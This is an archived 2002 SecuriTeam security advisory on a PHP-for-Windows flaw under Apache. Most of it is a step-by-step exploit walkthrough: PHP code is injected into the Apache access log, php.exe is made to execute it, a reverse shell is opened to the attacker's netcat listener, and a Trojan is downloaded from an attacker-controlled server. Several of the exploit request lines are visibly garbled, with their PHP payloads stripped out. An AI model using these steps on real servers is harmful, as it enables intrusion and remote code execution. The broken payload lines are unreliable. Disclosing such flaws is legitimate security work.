[NT] Gaining Root Access via PHP.exe

From: support@securiteam.com
Date: 01/23/02


From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 23 Jan 2002 13:36:39 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Gaining Root Access via PHP.exe
------------------------------------------------------------------------

SUMMARY

A major security vulnerability has been found in PHP for Windows, the
vulnerability would allow an attacker exploiting PHP's ability to view
files that reside outside the normal HTML root directory to execute
arbitrary code by inserting into the Apache log file a malicious PHP based
command.

DETAILS

Vulnerable systems:
PHP version 4.0 with Apache Server version 2.0

Exploit (Executing a command):
Assume that a user has installed apache in the location "c:\apache" and
that php.exe was installed in the default path of "c:\php\php.exe", the
exploit steps to gain root are as follows:
 
In the browser, you type the following:
 
1) http://www.example.com/('thecommandtoexecutewithpath');%20?>
 
Apache will then add this request line to the access.log file. By
requesting the log file with the php.exe exploit you can then run the php
system code like this :
 
2)
http://www.example.com/php/php.exe?c:\apache\logs\access.log
 
This will run the php code mentioned above.
 
The way root is gained is by getting the webserver to do a reverse telnet
back to your server running netcat such as the command:
 
"nc -l -n -v -p "
 
As you can see, this is a very simple way to compromise the entire server
with the php.exe exploit.

Exploit (Uploading a file):
1) Create a text file on your webserver called mytestfile.txt
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing
http://[YOUR_SERVER_IP]/mytestfile.txt
5) Check that the file exist on server by typing
http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests (If the browser does not seem to
connect, do not worry, it is. do not press refresh in any step, otherwise
this will not work. Remember to replace the brackets on the first two
lines)

7) Make the request in your browser
http://www.example.com/("http://[YOUR_SERVER_IP]/mytestfile.txt"," rb");?>

8) Wait for about 10 Seconds
9) Make the request in your browser
http://www.example.com/,[REPLACE_WITH_THE_SIZE_OF_YOUR_FILE]);?>

10) Wait for about 10 Seconds
11) Make the request in your browser
http://www.example.com/("c:/Apache2/htdocs/mytestfile.txt","wb");?>

12) Wait for about 10 Seconds
13) Make the request in your browser
http://www.example.com/);?>

14) Wait for about 10 Seconds
15) Make a request for a non-existent file (To flush the access log) by
typing
http://www.example.com/nonexistantfile.htm
16) Wait for about 10 seconds

17) Get php.exe to parse the apache logfile by typing
http://www.example.com/php/php.exe?c:\apache2\logs\access.log

18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing in your browser
http://www.example.com/mytestfile.txt

What happens is that php.exe runs the php code that has been logged in the
apache log file. The code in the apache log file then tells the server to
download the file from your server and save it into the apache directory.

The file uploaded can be a Trojan, exe file, php file, etc. There is no
limitation to what and where you can upload.

It is a very simple task to write a Trojan with CGI headers and to execute
it once uploaded.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:brereton_paul@btopenworld.com> Paul Brereton.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: New Web Vulnerability - Cross-Site Tracing
    ... > Security has unmasked a flaw in one of the Web's cornerstone protocols ... TRACE is IMHO a silly feature, but it's unrelated to the real problem. ... a simple GET request sent by XMLHTTP could ask for a page from ... TRACE would be a danger if there were a legitimate way to persuade a browser ...
    (Bugtraq)
  • Re: Microsoft Browser Under Scrutiny
    ... I already know this, I subscribe to Microsoft Security Updates, and I have ... especially Outlook and Internet Explorer. ... > ubiquitous Internet Explorer browser. ...
    (microsoft.public.windowsxp.basics)
  • Re: Microsoft Browser Under Scrutiny
    ... I already know this, I subscribe to Microsoft Security Updates, and I have ... especially Outlook and Internet Explorer. ... > ubiquitous Internet Explorer browser. ...
    (microsoft.public.windowsxp.newusers)
  • Re: Microsoft Browser Under Scrutiny
    ... I already know this, I subscribe to Microsoft Security Updates, and I have ... especially Outlook and Internet Explorer. ... > ubiquitous Internet Explorer browser. ...
    (microsoft.public.windowsxp.general)
  • Re: [Full-Disclosure] RIP: ActiveX controls in Internet Explorer?
    ... > source of security holes in Internet Explorer. ... > judgment against Microsoft for patent infringement. ... > Internet Explorer rather than pay Eolas any more money. ... > Internet Explorer browser looks like the perfect time to put pressure on ...
    (Full-Disclosure)